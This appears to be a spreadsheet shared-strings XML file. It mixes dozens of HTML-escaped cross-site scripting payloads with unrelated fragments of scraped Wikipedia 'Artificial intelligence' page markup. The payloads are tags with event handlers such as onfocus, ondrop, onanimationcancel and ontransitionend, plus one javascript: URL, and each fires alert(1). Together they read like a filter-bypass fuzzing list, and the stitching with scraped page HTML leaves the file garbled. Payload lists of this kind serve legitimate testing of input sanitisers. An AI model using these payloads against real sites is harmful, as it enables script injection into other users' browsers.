    <t>&lt;slot oncut="alert(1)" contenteditable&gt;test&lt;/slot&gt;</t>
  </si>
  <si>
    <t>&lt;body onclick="alert(1)"&gt;test&lt;/body&gt;</t>
  </si>
  <si>
    <t>&lt;script onclick="alert(1)"&gt;test&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;noscript onpointerout=alert(1)&gt;XSS&lt;/noscript&gt;</t>
  </si>
  <si>
    <t>&lt;rtc onpointerup=alert(1)&gt;XSS&lt;/rtc&gt;</t>
  </si>
  <si>
    <t>&lt;link id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/link&gt;</t>
  </si>
  <si>
    <t>&lt;source id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/source&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFRussellNorvig2003"&gt;Russell &amp;amp; Norvig (2003 &lt;/a&gt;, pp.&amp;#160;27, 932, 970–972) &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;h4&gt;&lt;span class="mw-headline" id="Transhumanism"&gt;Transhumanism </t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Reinforcement_learning" title="Reinforcement learning"&gt;Reinforcement learning &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;form onbeforecut="alert(1)" contenteditable&gt;test&lt;/form&gt;</t>
  </si>
  <si>
    <t>&lt;audio onkeypress="alert(1)" contenteditable&gt;test&lt;/audio&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="/wiki/Glossary_of_aerospace_engineering" title="Glossary of aerospace engineering"&gt;Aerospace engineering &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;(1876) &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;caption onmouseout="alert(1)"&gt;test&lt;/caption&gt;</t>
  </si>
  <si>
    <t>&lt;a href="/wiki/Game_theory" title="Game theory"&gt;Game theory &lt;/a&gt; and &lt;a href="/wiki/Mechanism_design" title="Mechanism design"&gt;mechanism design &lt;/a&gt;:</t>
  </si>
  <si>
    <t xml:space="preserve">		&lt;li id="ca-nstab-main" class="selected"&gt;&lt;a href="/wiki/Artificial_intelligence" title="View the content page [c]" accesskey="c"&gt;Article &lt;/a&gt; &lt;/li&gt;&lt;li id="ca-talk"&gt;&lt;a href="/wiki/Talk:Artificial_intelligence" rel="discussion" title="Discussion about the content page [t]" accesskey="t"&gt;Talk &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation news"&gt;Lohr, Steve (2017). &lt;a rel="nofollow" class="external text" href="https://www.nytimes.com/2017/01/12/technology/robots-will-take-jobs-but-not-as-fast-as-some-fear-new-report-says.html"&gt;"Robots Will Take Jobs, but Not as Fast as Some Fear, New Report Says" &lt;/a&gt;. &lt;i&gt;The New York Times &lt;/i&gt;&lt;span class="reference-accessdate"&gt;. Retrieved &lt;span class="nowrap"&gt;13 January </t>
  </si>
  <si>
    <t>&lt;blink onbeforepaste="alert(1)" contenteditable&gt;test&lt;/blink&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;bdo ondragover=alert(1) contenteditable&gt;drop here&lt;/bdo&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;strike ondragover=alert(1) contenteditable&gt;drop here&lt;/strike&gt;</t>
  </si>
  <si>
    <t>&lt;iframe onreadystatechange=alert(1)&gt;&lt;/iframe&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;(2016) &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation journal"&gt;Cambria, Erik; White, Bebo (May 2014). "Jumping NLP Curves: A Review of Natural Language Processing Research [Review Article]". &lt;i&gt;IEEE Computational Intelligence Magazine &lt;/i&gt;. &lt;b&gt;9 &lt;/b&gt; (2): 48–57. &lt;a href="/wiki/Digital_object_identifier" title="Digital object identifier"&gt;doi &lt;/a&gt;:&lt;a rel="nofollow" class="external text" href="https://doi.org/10.1109%2FMCI.2014.2307227"&gt;10.1109/MCI.2014.2307227 &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=IEEE+Computational+Intelligence+Magazine&amp;amp;rft.atitle=Jumping+NLP+Curves%3A+A+Review+of+Natural+Language+Processing+Research+%5BReview+Article%5D&amp;amp;rft.volume=9&amp;amp;rft.issue=2&amp;amp;rft.pages=48-57&amp;amp;rft.date=2014-05&amp;amp;rft_id=info%3Adoi%2F10.1109%2FMCI.2014.2307227&amp;amp;rft.aulast=Cambria&amp;amp;rft.aufirst=Erik&amp;amp;rft.au=White%2C+Bebo&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Propositional_logic-197"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-Propositional_logic_197-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;a href="/wiki/Hilbert%27s_program" title="Hilbert&amp;#39;s program"&gt;Hilbert's program &lt;/a&gt;&lt;span class="nowrap"&gt;&amp;#160; </t>
  </si>
  <si>
    <t>&lt;img ondblclick="alert(1)"&gt;test&lt;/img&gt;</t>
  </si>
  <si>
    <t>&lt;select onmousemove="alert(1)"&gt;test&lt;/select&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;content id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/content&gt;</t>
  </si>
  <si>
    <t>&lt;br ondblclick="alert(1)"&gt;test&lt;/br&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFPooleMackworthGoebel1998"&gt;Poole, Mackworth &amp;amp; Goebel 1998 &lt;/a&gt;, pp.&amp;#160;113–132 &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;output onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/output&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;blockquote id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/blockquote&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;div id="Philosophers_of_science_by_era" style="font-size:114%;margin:0 4em"&gt;&lt;a href="/wiki/List_of_philosophers_of_science" title="List of philosophers of science"&gt;Philosophers of science &lt;/a&gt; by era &lt;/div&gt; &lt;/th&gt; &lt;/tr&gt;&lt;tr&gt;&lt;td colspan="2" class="navbox-list navbox-odd" style="width:100%;padding:0px"&gt;</t>
  </si>
  <si>
    <t>&lt;time ondblclick="alert(1)"&gt;test&lt;/time&gt;</t>
  </si>
  <si>
    <t>&lt;nobr draggable="true" ondragleave="alert(1)"&gt;test&lt;/nobr&gt;</t>
  </si>
  <si>
    <t>&lt;img onbeforepaste="alert(1)" contenteditable&gt;test&lt;/img&gt;</t>
  </si>
  <si>
    <t>&lt;bdo onpaste="alert(1)" contenteditable&gt;test&lt;/bdo&gt;</t>
  </si>
  <si>
    <t>&lt;pre onmouseenter="alert(1)"&gt;test&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;listing onkeypress="alert(1)" contenteditable&gt;test&lt;/listing&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;samp onload=alert(1)&gt;&lt;/samp&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;title style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/title&gt;</t>
  </si>
  <si>
    <t>&lt;em id=x tabindex=1 onfocus=alert(1)&gt;&lt;/em&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFNilsson1998"&gt;Nilsson 1998 &lt;/a&gt;, chpt. 13 &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFRussellNorvig2003"&gt;Russell &amp;amp; Norvig 2003 &lt;/a&gt;, pp.&amp;#160;375–459, &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-208"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-208"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;details onmouseout="alert(1)"&gt;test&lt;/details&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;td id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/td&gt;</t>
  </si>
  <si>
    <t>&lt;dialog draggable="true" ondragend="alert(1)"&gt;test&lt;/dialog&gt;</t>
  </si>
  <si>
    <t>&lt;label id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/label&gt;</t>
  </si>
  <si>
    <t>&lt;del onmouseout="alert(1)"&gt;test&lt;/del&gt;</t>
  </si>
  <si>
    <t>&lt;b id=x tabindex=1 onfocus=alert(1)&gt;&lt;/b&gt;</t>
  </si>
  <si>
    <t>&lt;select onmouseleave="alert(1)"&gt;test&lt;/select&gt;</t>
  </si>
  <si>
    <t>&lt;shadow onpaste="alert(1)" contenteditable&gt;test&lt;/shadow&gt;</t>
  </si>
  <si>
    <t>&lt;video autoplay onplaying=alert(1)&gt;&lt;source src="validvideo.mp4" type="video/mp4"&gt;&lt;/video&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Bas_van_Fraassen" title="Bas van Fraassen"&gt;Bas van Fraassen &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;kbd id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/kbd&gt;</t>
  </si>
  <si>
    <t>&lt;b onmouseenter="alert(1)"&gt;test&lt;/b&gt;</t>
  </si>
  <si>
    <t>&lt;map onpointerdown=alert(1)&gt;XSS&lt;/map&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-403"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-403"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;kbd id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/kbd&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">Pamela &lt;a href="#CITEREFMcCorduck2004"&gt;McCorduck (2004 &lt;/a&gt;, pp.&amp;#160;424) writes of "the rough shattering of AI in subfields—vision, natural language, decision theory, genetic algorithms, robotics&amp;#160;... and these with own sub-subfield—that would hardly have anything to say to each other." </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;a href="/w/index.php?title=Artificial_intelligence&amp;amp;action=edit&amp;amp;section=17" title="Edit section: Cognitive simulation"&gt;edit &lt;/a&gt;&lt;span class="mw-editsection-bracket"&gt;] </t>
  </si>
  <si>
    <t>&lt;xmp draggable="true" ondrag="alert(1)"&gt;test&lt;/xmp&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;plaintext style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/plaintext&gt;</t>
  </si>
  <si>
    <t>&lt;footer oncontextmenu="alert(1)"&gt;test&lt;/footer&gt;</t>
  </si>
  <si>
    <t>&lt;small onkeydown="alert(1)" contenteditable&gt;test&lt;/small&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;blink ondrop=alert(1) contenteditable&gt;drop here&lt;/blink&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;kbd onload=alert(1)&gt;&lt;/kbd&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;dialog id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/dialog&gt;</t>
  </si>
  <si>
    <t>&lt;wbr onblur=alert(1) tabindex=1 id=x&gt;&lt;/wbr&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;fieldset onblur=alert(1) tabindex=1 id=x&gt;&lt;/fieldset&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;cite id="CITEREFNilsson1983" class="citation journal"&gt;&lt;a href="/wiki/Nils_Nilsson_(researcher)" class="mw-redirect" title="Nils Nilsson (researcher)"&gt;Nilsson, Nils &lt;/a&gt; (1983). &lt;a rel="nofollow" class="external text" href="https://ai.stanford.edu/~nilsson/OnlinePubs-Nils/General%20Essays/AIMag04-04-002.pdf"&gt;"Artificial Intelligence Prepares for 2001" &lt;/a&gt; &lt;span class="cs1-format"&gt;(PDF) </t>
  </si>
  <si>
    <t>&lt;dfn onpointerover=alert(1)&gt;XSS&lt;/dfn&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Rendering_(computer_graphics)" title="Rendering (computer graphics)"&gt;Rendering &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;link rel="dns-prefetch" href="//login.wikimedia.org"/&gt;</t>
  </si>
  <si>
    <t>&lt;ol onpointerleave=alert(1)&gt;XSS&lt;/ol&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;span style="display: inline-block; margin-left: 4px; width: 182px; vertical-align: middle;"&gt;&lt;a href="https://commons.wikimedia.org/wiki/Category:Artificial_intelligence" class="extiw" title="c:Category:Artificial intelligence"&gt;Media &lt;/a&gt; from Wikimedia Commons </t>
  </si>
  <si>
    <t>&lt;input onkeyup="alert(1)" contenteditable&gt;test&lt;/input&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;s id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/s&gt;</t>
  </si>
  <si>
    <t>&lt;li onpointerup=alert(1)&gt;XSS&lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;h4&gt;&lt;span class="mw-headline" id="Devaluation_of_humanity"&gt;Devaluation of humanity </t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;dialog id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/dialog&gt;</t>
  </si>
  <si>
    <t>&lt;html onmouseleave="alert(1)"&gt;test&lt;/html&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-First-order_logic-198"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-First-order_logic_198-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;footer onmousemove="alert(1)"&gt;test&lt;/footer&gt;</t>
  </si>
  <si>
    <t>&lt;source id=x tabindex=1 onfocus=alert(1)&gt;&lt;/source&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;img ondrop=alert(1) contenteditable&gt;drop here&lt;/img&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="/wiki/Evolutionary_robotics" title="Evolutionary robotics"&gt;Evolutionary &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;b onpointerenter=alert(1)&gt;XSS&lt;/b&gt;</t>
  </si>
  <si>
    <t>&lt;em id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/em&gt;</t>
  </si>
  <si>
    <t>&lt;form&gt;&lt;a href="javascript:\u0061lert(1)"&gt;X</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;ol id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/ol&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li class="toclevel-3 tocsection-66"&gt;&lt;a href="#Technological_singularity"&gt;&lt;span class="tocnumber"&gt;8.5.1 </t>
  </si>
  <si>
    <t>&lt;object onmousemove="alert(1)"&gt;test&lt;/object&gt;</t>
  </si>
  <si>
    <t>&lt;progress onpointermove=alert(1)&gt;XSS&lt;/progress&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;s id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/s&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Machine_vision" title="Machine vision"&gt;Machine vision &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;noframes style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/noframes&gt;</t>
  </si>
  <si>
    <t>&lt;marquee onpointerup=alert(1)&gt;XSS&lt;/marquee&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;a href="/w/index.php?title=Artificial_intelligence&amp;amp;action=edit&amp;amp;section=36" title="Edit section: Healthcare"&gt;edit &lt;/a&gt;&lt;span class="mw-editsection-bracket"&gt;] </t>
  </si>
  <si>
    <t>&lt;a draggable="true" ondragstart="alert(1)"&gt;test&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;base onpointerdown=alert(1)&gt;XSS&lt;/base&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;ins id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/ins&gt;</t>
  </si>
  <si>
    <t>&lt;rp onmouseover="alert(1)"&gt;test&lt;/rp&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFRussellNorvig2003"&gt;Russell &amp;amp; Norvig 2003 &lt;/a&gt;, pp.&amp;#160;328–341, &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;div class="magnify"&gt;&lt;a href="/wiki/File:X-ray_of_a_hand_with_automatic_bone_age_calculation.jpg" class="internal" title="Enlarge"&gt; &lt;/a&gt; &lt;/div&gt;&lt;a href="/wiki/Projectional_radiography" title="Projectional radiography"&gt;X-ray &lt;/a&gt; of a hand, with automatic calculation of &lt;a href="/wiki/Bone_age" title="Bone age"&gt;bone age &lt;/a&gt; by computer software &lt;/div&gt; &lt;/div&gt; &lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;iframe id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/iframe&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;figcaption onbeforecopy="alert(1)" contenteditable&gt;test&lt;/figcaption&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Consciousness" title="Consciousness"&gt;Consciousness &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;svg id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/svg&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;tfoot id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/tfoot&gt;</t>
  </si>
  <si>
    <t>&lt;big draggable="true" ondrag="alert(1)"&gt;test&lt;/big&gt;</t>
  </si>
  <si>
    <t>&lt;noframes ondblclick="alert(1)"&gt;test&lt;/noframes&gt;</t>
  </si>
  <si>
    <t>&lt;tfoot onpointerenter=alert(1)&gt;XSS&lt;/tfoot&gt;</t>
  </si>
  <si>
    <t>&lt;rtc id=x tabindex=1 onfocus=alert(1)&gt;&lt;/rtc&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/p&gt;&lt;p&gt;&lt;a href="/wiki/Bayesian_network" title="Bayesian network"&gt;Bayesian networks &lt;/a&gt;&lt;sup id="cite_ref-Bayesian_networks_205-0" class="reference"&gt;&lt;a href="#cite_note-Bayesian_networks-205"&gt;&amp;#91;200&amp;#93; &lt;/a&gt; &lt;/sup&gt; are a very general tool that can be used for various problems: reasoning (using the &lt;a href="/wiki/Bayesian_inference" title="Bayesian inference"&gt;Bayesian inference &lt;/a&gt; algorithm),&lt;sup id="cite_ref-Bayesian_inference_206-0" class="reference"&gt;&lt;a href="#cite_note-Bayesian_inference-206"&gt;&amp;#91;201&amp;#93; &lt;/a&gt; &lt;/sup&gt; &lt;a href="/wiki/Machine_learning" title="Machine learning"&gt;learning &lt;/a&gt; (using the &lt;a href="/wiki/Expectation-maximization_algorithm" class="mw-redirect" title="Expectation-maximization algorithm"&gt;expectation-maximization algorithm &lt;/a&gt;),&lt;sup id="cite_ref-208" class="reference"&gt;&lt;a href="#cite_note-208"&gt;&amp;#91;f&amp;#93; &lt;/a&gt; &lt;/sup&gt;&lt;sup id="cite_ref-Bayesian_learning_209-0" class="reference"&gt;&lt;a href="#cite_note-Bayesian_learning-209"&gt;&amp;#91;203&amp;#93; &lt;/a&gt; &lt;/sup&gt; &lt;a href="/wiki/Automated_planning_and_scheduling" title="Automated planning and scheduling"&gt;planning &lt;/a&gt; (using &lt;a href="/wiki/Decision_network" class="mw-redirect" title="Decision network"&gt;decision networks &lt;/a&gt;)&lt;sup id="cite_ref-Bayesian_decision_networks_210-0" class="reference"&gt;&lt;a href="#cite_note-Bayesian_decision_networks-210"&gt;&amp;#91;204&amp;#93; &lt;/a&gt; &lt;/sup&gt; and &lt;a href="/wiki/Machine_perception" title="Machine perception"&gt;perception &lt;/a&gt; (using &lt;a href="/wiki/Dynamic_Bayesian_network" title="Dynamic Bayesian network"&gt;dynamic Bayesian networks &lt;/a&gt;).&lt;sup id="cite_ref-Stochastic_temporal_models_211-0" class="reference"&gt;&lt;a href="#cite_note-Stochastic_temporal_models-211"&gt;&amp;#91;205&amp;#93; &lt;/a&gt; &lt;/sup&gt; Probabilistic algorithms can also be used for filtering, prediction, smoothing and finding explanations for streams of data, helping &lt;a href="/wiki/Machine_perception" title="Machine perception"&gt;perception &lt;/a&gt; systems to analyze processes that occur over time (e.g., &lt;a href="/wiki/Hidden_Markov_model" title="Hidden Markov model"&gt;hidden Markov models &lt;/a&gt; or &lt;a href="/wiki/Kalman_filter" title="Kalman filter"&gt;Kalman filters &lt;/a&gt;).&lt;sup id="cite_ref-Stochastic_temporal_models_211-1" class="reference"&gt;&lt;a href="#cite_note-Stochastic_temporal_models-211"&gt;&amp;#91;205&amp;#93; &lt;/a&gt; &lt;/sup&gt; Compared with symbolic logic, formal Bayesian inference is computationally expensive. For inference to be tractable, most observations must be &lt;a href="/wiki/Conditionally_independent" class="mw-redirect" title="Conditionally independent"&gt;conditionally independent &lt;/a&gt; of one another. Complicated graphs with diamonds or other "loops" (undirected &lt;a href="/wiki/Cycle_(graph_theory)" title="Cycle (graph theory)"&gt;cycles &lt;/a&gt;) can require a sophisticated method such as &lt;a href="/wiki/Markov_chain_Monte_Carlo" title="Markov chain Monte Carlo"&gt;Markov chain Monte Carlo &lt;/a&gt;, which spreads an ensemble of &lt;a href="/wiki/Random_walk" title="Random walk"&gt;random walkers &lt;/a&gt; throughout the Bayesian network and attempts to converge to an assessment of the conditional probabilities. Bayesian networks are used on &lt;a href="/wiki/Xbox_Live" title="Xbox Live"&gt;Xbox Live &lt;/a&gt; to rate and match players; wins and losses are "evidence" of how good a player is&lt;sup class="noprint Inline-Template Template-Fact" style="white-space:nowrap;"&gt;&amp;#91;&lt;i&gt;&lt;a href="/wiki/Wikipedia:Citation_needed" title="Wikipedia:Citation needed"&gt;&lt;span title="This claim needs references to reliable sources. (July 2019)"&gt;citation needed </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;cite id="CITEREFHinton2007" class="citation journal"&gt;Hinton, G. E. (2007). "Learning multiple layers of representation". &lt;i&gt;Trends in Cognitive Sciences &lt;/i&gt;. &lt;b&gt;11 &lt;/b&gt; (10): 428–434. &lt;a href="/wiki/Digital_object_identifier" title="Digital object identifier"&gt;doi &lt;/a&gt;:&lt;a rel="nofollow" class="external text" href="https://doi.org/10.1016%2Fj.tics.2007.09.004"&gt;10.1016/j.tics.2007.09.004 &lt;/a&gt;. &lt;a href="/wiki/PubMed_Identifier" class="mw-redirect" title="PubMed Identifier"&gt;PMID &lt;/a&gt;&amp;#160;&lt;a rel="nofollow" class="external text" href="//pubmed.ncbi.nlm.nih.gov/17921042"&gt;17921042 &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=Trends+in+Cognitive+Sciences&amp;amp;rft.atitle=Learning+multiple+layers+of+representation&amp;amp;rft.volume=11&amp;amp;rft.issue=10&amp;amp;rft.pages=428-434&amp;amp;rft.date=2007&amp;amp;rft_id=info%3Adoi%2F10.1016%2Fj.tics.2007.09.004&amp;amp;rft_id=info%3Apmid%2F17921042&amp;amp;rft.aulast=Hinton&amp;amp;rft.aufirst=G.+E.&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;h1 onbeforepaste="alert(1)" contenteditable&gt;test&lt;/h1&gt;</t>
  </si>
  <si>
    <t>&lt;map onkeydown="alert(1)" contenteditable&gt;test&lt;/map&gt;</t>
  </si>
  <si>
    <t>&lt;data onpointermove=alert(1)&gt;XSS&lt;/data&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">The most extreme form of this argument (the brain replacement scenario) was put forward by &lt;a href="/wiki/Clark_Glymour" title="Clark Glymour"&gt;Clark Glymour &lt;/a&gt; in the mid-1970s and was touched on by &lt;a href="/wiki/Zenon_Pylyshyn" title="Zenon Pylyshyn"&gt;Zenon Pylyshyn &lt;/a&gt; and &lt;a href="/wiki/John_Searle" title="John Searle"&gt;John Searle &lt;/a&gt; in 1980. </t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;plaintext ondrop=alert(1) contenteditable&gt;drop here&lt;/plaintext&gt;</t>
  </si>
  <si>
    <t>&lt;center onbeforepaste="alert(1)" contenteditable&gt;test&lt;/center&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Geoffrey_Vickers" title="Geoffrey Vickers"&gt;Charles Geoffrey Vickers &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/p&gt;&lt;p&gt;The development of &lt;a href="/wiki/Metal%E2%80%93oxide%E2%80%93semiconductor" class="mw-redirect" title="Metal–oxide–semiconductor"&gt;metal–oxide–semiconductor &lt;/a&gt; (MOS) &lt;a href="/wiki/Very-large-scale_integration" class="mw-redirect" title="Very-large-scale integration"&gt;very-large-scale integration &lt;/a&gt; (VLSI), in the form of &lt;a href="/wiki/Complementary_MOS" class="mw-redirect" title="Complementary MOS"&gt;complementary MOS &lt;/a&gt; (CMOS) &lt;a href="/wiki/Transistor" title="Transistor"&gt;transistor &lt;/a&gt; technology, enabled the development of practical &lt;a href="/wiki/Artificial_neural_network" title="Artificial neural network"&gt;artificial neural network &lt;/a&gt; (ANN) technology in the 1980s. A landmark publication in the field was the 1989 book &lt;i&gt;Analog VLSI Implementation of Neural Systems &lt;/i&gt; by Carver A. Mead and Mohammed Ismail.&lt;sup id="cite_ref-Mead_42-0" class="reference"&gt;&lt;a href="#cite_note-Mead-42"&gt;&amp;#91;42&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li class="toclevel-2 tocsection-60"&gt;&lt;a href="#Machine_consciousness,_sentience_and_mind"&gt;&lt;span class="tocnumber"&gt;8.4 </t>
  </si>
  <si>
    <t>&lt;bdo onmouseover="alert(1)"&gt;test&lt;/bdo&gt;</t>
  </si>
  <si>
    <t>&lt;div role="note" class="hatnote navigation-not-searchable"&gt;Main articles: &lt;a href="/wiki/Cybernetics" title="Cybernetics"&gt;Cybernetics &lt;/a&gt; and &lt;a href="/wiki/Computational_neuroscience" title="Computational neuroscience"&gt;Computational neuroscience &lt;/a&gt; &lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;dfn ondrop=alert(1) contenteditable&gt;drop here&lt;/dfn&gt;</t>
  </si>
  <si>
    <t>&lt;hr onkeyup="alert(1)" contenteditable&gt;test&lt;/hr&gt;</t>
  </si>
  <si>
